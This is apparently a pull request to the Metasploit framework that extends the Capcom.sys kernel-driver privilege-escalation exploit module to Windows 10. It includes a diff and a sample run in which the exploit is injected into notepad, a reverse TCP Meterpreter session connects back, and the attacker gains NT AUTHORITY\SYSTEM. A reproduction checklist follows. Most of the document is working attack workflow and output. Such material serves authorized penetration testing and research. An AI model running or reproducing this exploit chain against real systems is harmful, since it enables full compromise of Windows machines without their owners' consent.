### PR TITLE
Update capcom exploit module to support Windows 10

### DIFF
--- a/modules/exploits/windows/local/capcom_sys_exec.rb
+++ b/modules/exploits/windows/local/capcom_sys_exec.rb
@@ -22,7 +22,7 @@ class MetasploitModule < Msf::Exploit::Local
         This module abuses the Capcom.sys kernel driver's function that allows for an
         arbitrary function to be executed in the kernel from user land. This function
         purposely disables SMEP prior to invoking a function given by the caller.
-        This has been tested on Windows 7 x64.
+        This has been tested on Windows 7, 8.1 and Windows 10 (x64).
       },
       'License'         => MSF_LICENSE,
       'Author'          => [
@@ -36,7 +36,7 @@ class MetasploitModule < Msf::Exploit::Local
           'EXITFUNC'    => 'thread',
         },
       'Targets'         => [
-          [ 'Windows x64 (<= 8)', { 'Arch' => ARCH_X86_64 } ]
+          [ 'Windows x64 (<= 10)', { 'Arch' => ARCH_X86_64 } ]
         ],
       'Payload'         => {
           'Space'       => 4096,
@@ -51,7 +51,7 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def check
-    if sysinfo['OS'] !~ /windows (7|8)/i
+    if sysinfo['OS'] !~ /windows (7|8|10)/i
       return Exploit::CheckCode::Unknown
     end
 


### PR DESCRIPTION
I originally thought that this wouldn't work on Windows 10 thanks to SMAP. It appears that the Capcom driver disables that as well. So this exploit "just works" on Windows 10 too! I've updated the module so that the regex/info/etc include this.
## Sample run

```
meterpreter > sysinfo
Computer        : DESKTOP-5A73R51
OS              : Windows 10 (Build 14393).
Architecture    : x64
System Language : en_AU
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/win64
meterpreter > background
[*] Backgrounding session 1...
msf exploit(capcom_sys_exec) > set session 1
session => 1
msf exploit(capcom_sys_exec) > rexploit
[*] Reloading module...

[*] [2016.10.15-11:53:55] Started reverse TCP handler on 10.1.10.35:5555
[*] [2016.10.15-11:53:56] Launching notepad to host the exploit...
[+] [2016.10.15-11:53:56] Process 5096 launched.
[*] [2016.10.15-11:53:56] Reflectively injecting the exploit DLL into 5096...
[*] [2016.10.15-11:53:56] Injecting exploit into 5096...
[*] [2016.10.15-11:53:56] Exploit injected. Injecting payload into 5096...
[*] [2016.10.15-11:53:56] Payload injected. Executing exploit...
[+] [2016.10.15-11:53:57] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] [2016.10.15-11:53:57] Sending stage (1217071 bytes) to 10.1.10.35
[*] Meterpreter session 2 opened (10.1.10.35:5555 -> 10.1.10.35:51028) at 2016-10-15 11:53:58 +1000

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : DESKTOP-5A73R51
OS              : Windows 10 (Build 14393).
Architecture    : x64
System Language : en_AU
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/win64
```
## Verification
- [x] Create an x64 payload.
- [x] Create an x64 handler.
- [x] Install the capcom driver on windows 10 fully patched x64.
- [x] Run the payload as a low priv user.
- [x] Use the module and run it on the current session.
- [x] **Verify** that the new session comes in and is running as `NT AUTHORITY\SYSTEM`.
- [x] Do the shell dance.
